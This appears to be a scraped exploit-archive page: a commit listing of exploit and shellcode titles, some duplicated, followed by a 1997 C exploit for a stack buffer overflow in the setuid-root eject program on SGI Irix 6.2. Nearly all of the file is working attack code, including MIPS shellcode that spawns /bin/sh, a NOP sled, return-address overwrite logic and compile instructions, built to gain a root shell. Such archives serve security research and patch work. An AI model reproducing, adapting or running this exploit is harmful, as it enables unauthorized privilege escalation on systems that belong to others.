880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
107 lines
No EOL
3.4 KiB
C
107 lines
No EOL
3.4 KiB
C
// source: https://www.securityfocus.com/bid/351/info
|
|
|
|
A vulnerability exists in the eject program shipped with Irix 6.2 from Silicon Graphics. By supplying a long argument to the eject program, it is possible to overwrite the return address on the stack, and execute arbitrary code as root. Eject is normally used to eject removeable media from the system, and as such is setuid root to allow for any user at the console to perform eject operations.
|
|
|
|
/* /usr/sbin/eject exploit by DCRH 25/5/97
|
|
*
|
|
* Tested on: R8000 Power Challenge (Irix64 6.2)
|
|
*
|
|
* Exploit doesn't work on Irix 5.x due to stack position
|
|
* Irix 6.3 does not appear to be vulnerable
|
|
*
|
|
* compile as: cc -n32 eject.c
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <sys/types.h>
|
|
#include <unistd.h>
|
|
|
|
#define NUM_ADDRESSES 80
|
|
#define BUF_LENGTH 400
|
|
#define EXTRA 200
|
|
#define OFFSET -0x128
|
|
#define GP_OFFSET 32412
|
|
#define IRIX_NOP 0x03e0f825 /* move $ra,$ra */
|
|
|
|
#define u_long unsigned
|
|
|
|
|
|
u_long get_sp_code[] = {
|
|
0x03a01025, /* move $v0,$sp */
|
|
0x03e00008, /* jr $ra */
|
|
0x00000000, /* nop */
|
|
};
|
|
|
|
u_long irix_shellcode[] = {
|
|
0x24041234, /* li $4,0x1234 */
|
|
0x2084edcc, /* sub $4,0x1234 */
|
|
0x0491fffe, /* bgezal $4,pc-4 */
|
|
0x03bd302a, /* sgt $6,$sp,$sp */
|
|
0x23e4012c, /* addi $4,$31,264+36 */
|
|
0xa086feff, /* sb $6,-264+7($4) */
|
|
0x2084fef8, /* sub $4,264 */
|
|
0x20850110, /* addi $5,$4,264+8 */
|
|
0xaca4fef8, /* sw $4,-264($5) */
|
|
0xaca6fefc, /* sw $4,-260($5) */
|
|
0x20a5fef8, /* sub $5, 264 */
|
|
0x240203f3, /* li $v0,1011 */
|
|
0x03ffffcc, /* syscall 0xfffff */
|
|
0x2f62696e, /* "/bin" */
|
|
0x2f7368ff, /* "/sh" */
|
|
};
|
|
|
|
char buf[NUM_ADDRESSES+BUF_LENGTH + EXTRA + 8];
|
|
|
|
void main(int argc, char **argv)
|
|
{
|
|
char *env[] = {NULL};
|
|
u_long targ_addr, stack;
|
|
u_long *long_p;
|
|
int i, code_length = strlen((char *)irix_shellcode)+1;
|
|
u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;
|
|
|
|
stack = get_sp();
|
|
|
|
if (stack & 0x80000000) {
|
|
printf("Recompile with the '-n32' option\n");
|
|
exit(1);
|
|
}
|
|
|
|
long_p =(u_long *) buf;
|
|
targ_addr = stack + OFFSET;
|
|
|
|
if (argc > 1)
|
|
targ_addr += atoi(argv[1]) * 4;
|
|
|
|
if (targ_addr + GP_OFFSET > 0x80000000) {
|
|
printf("Sorry - this exploit for Irix 6.x only\n");
|
|
exit(1);
|
|
}
|
|
|
|
while ((targ_addr & 0xff000000) == 0 ||
|
|
(targ_addr & 0x00ff0000) == 0 ||
|
|
(targ_addr & 0x0000ff00) == 0 ||
|
|
(targ_addr & 0x000000ff) == 0)
|
|
targ_addr += 4;
|
|
|
|
for (i = 0; i < NUM_ADDRESSES/sizeof(u_long); i++)
|
|
*long_p++ = targ_addr + NUM_ADDRESSES/2;
|
|
|
|
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
|
|
*long_p++ = IRIX_NOP;
|
|
|
|
for (i = 0; i < code_length/sizeof(u_long); i++)
|
|
*long_p++ = irix_shellcode[i];
|
|
|
|
for (i = 0; i < EXTRA / sizeof(u_long); i++)
|
|
*long_p++ = targ_addr + GP_OFFSET;
|
|
|
|
*long_p = 0;
|
|
|
|
printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr);
|
|
|
|
execle("/usr/sbin/eject", "eject", buf, 0, env);
|
|
perror("execl failed");
|
|
} |